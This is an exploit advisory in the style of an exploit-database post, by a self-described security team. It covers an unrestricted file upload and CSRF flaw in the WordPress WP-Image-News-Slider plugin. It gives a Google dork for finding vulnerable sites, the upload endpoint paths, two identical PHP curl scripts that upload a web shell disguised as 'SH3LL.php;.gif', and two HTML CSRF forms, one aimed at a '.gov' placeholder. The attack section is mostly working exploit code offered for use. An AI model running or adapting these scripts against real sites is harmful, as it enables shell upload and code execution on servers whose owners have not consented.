##################################################################################

# Exploit Title : WordPress WP-Image-News-Slider Plugins 3.3 CSRF Shell Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 05/03/2019
# Vendor Homepage : wpslideshow.com
# Software Information Link : wpslideshow.com/newsimage-slider/
# Software Affected Versions : 3.0 ~ 3.1 ~ 3.2 ~ 3.3 ~ 3.5
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/wp-image-news-slider/"
# Vulnerability Type : 
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

##################################################################################

# Description about Software :
***************************
Image News slider is a plugin that allow us to display slideshow on your website.

* Customizable gallery width and gallery height
* Image description
* Customizable Text display panel width
* Customizable auto play time
* Transition Time
* Customizable slide interval
* Customizable scalling

##################################################################################

# Impact :
**********
WordPress WP-Image-News-Slider Plugins 3.3 and other versions  is prone to an arbitrary 

file upload vulnerability. An attacker may leverage this issue to upload arbitrary files to the 

affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

Weaknesses in this category are related to the management of permissions, privileges, 

and other security features that are used to perform access control.

##################################################################################

Installation Video from Vendor => 
*******************************
youtube.com/watch?feature=player_embedded&v=DQ-rIX8Akug

== Installation ==

1. Install automatically through the `Plugins`, `Add New` menu in WordPress, or 

upload the `wp-image-news-slider` folder to the `/wp-content/plugins/` directory. 

2. Activate the plugin through the `Plugins` menu in WordPress. you can find 

"Slider" link  on left side navigation, click on to configure plugin Options. 

##################################################################################

Direct Access Exploit 1 :
***********************
/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php

Vulnerability Error :
******************
No upload found in $_FILES for Filedata - Security word error.

Note : We have to use CSRF or PHP Exploiter for successfull exploitation.

Exploit 2 :
*********
/wp-admin/admin.php?page=image-news-slider_manage

Vulnerability Error :
******************
WP_Error Object ( [errors] => Array ( [image_no_editor] => 
Array ( [0] => No editor could be selected. ) )
 [error_data] => Array ( ) ) Error

# Directory File Path :
********************
/wp-content/uploads/image-news-slider/2_uploadfolder/big/.......

/wp-content/uploads/image-news-slider/30_uploadfolder/big/.....

/wp-content/uploads/image-news-slider/[ID-NUMBER]_uploadfolder/big/.......

/wp-content/plugins/wp-image-news-slider/js/swfupload/......

/wp-content/uploads/.....

##################################################################################

Exploit :
*******

# PHP Backdoor Access / Shell Upload / Arbitrary File Upload Exploiter 1 :
****************************************************************

<?php

$uploadfile="SH3LL.php;.gif"; 
$ch = curl_init("https://[VULNERABLEWEBSITE]/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

##################################################################################

# PHP Backdoor Access / Shell Upload / Arbitrary File Upload Exploiter 2 :
****************************************************************
<?php
$uploadfile="SH3LL.php;.gif";
$ch = curl_init("https://[VULNERABLEWEBSITE]/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : https://[VULNERABLEWEBSITE]/[PATH]/wp-content/plugins/wp-image-news-slider/js/swfupload/....
<?php
phpinfo();
?>

##################################################################################

Cross Site Request Forgery CSRF Exploiter 1 => 
******************************************
<html>
<body>
<form action="https://www.[VULNERABLESITE].gov/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload for WordPress WP-Image-News-Slider" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload for WordPress WP-Image-News-Slider" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

##################################################################################

Cross Site Request Forgery CSRF Exploiter 2 => 
******************************************
<html>
<body>
<form action="https://[VULNERABLEWEBSITE]/wp-admin/admin.php?page=image-news-slider_manage" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="slider_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload for WordPress WP-Image-News-Slider" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload for WordPress WP-Image-News-Slider" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

##################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

##################################################################################